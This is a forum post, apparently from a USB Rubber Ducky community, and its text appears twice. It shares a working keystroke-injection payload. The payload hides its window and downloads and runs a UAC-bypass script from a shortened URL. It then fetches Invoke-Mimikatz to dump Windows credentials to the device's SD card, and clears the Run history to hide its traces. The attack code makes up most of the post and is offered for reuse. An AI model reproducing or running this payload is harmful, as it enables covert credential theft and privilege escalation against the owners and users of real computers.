I've been playing with the ducky for some time, figured it was time to give back to the community. I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer.
The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present. I suspect it is because the exploit pops the new window up, and likely there is nothing I can do. Hopefully someone can figure it out.
Otherwise it works pretty nice. Feel free to clean it up and make it better.
REM open cmd and set drive letter
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1
ENTER
DELAY 1000
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm'); Bypass-UAC -Method ucmDismMethod; exit;"
ENTER
DELAY 1000
REM Shrink windows
STRING mode CON: COLS=15 LINES=1
ENTER
REM get Ducky Drive letter
STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}
ENTER
DELAY 500
REM Run Mimikatz and dump to ducky in file named after computer
STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt");
ENTER
DELAY 1000
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit
ENTER
mimikatz output to SD card, with new UAC exploit, NO UAC popup to deal with
in Classic USB Rubber Ducky
Posted
Hi all,
I've been playing with the ducky for some time, figured it was time to give back to the community. I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer.
The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present. I suspect it is because the exploit pops the new window up, and likely there is nothing I can do. Hopefully someone can figure it out.
Otherwise it works pretty nice. Feel free to clean it up and make it better.
REM open cmd and set drive letter DELAY 2000 WINDOWS r DELAY 200 STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 ENTER DELAY 1000 STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm'); Bypass-UAC -Method ucmDismMethod; exit;" ENTER DELAY 1000 REM Shrink windows STRING mode CON: COLS=15 LINES=1 ENTER REM get Ducky Drive letter STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'} ENTER DELAY 500 REM Run Mimikatz and dump to ducky in file named after computer STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt"); ENTER DELAY 1000 STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit ENTER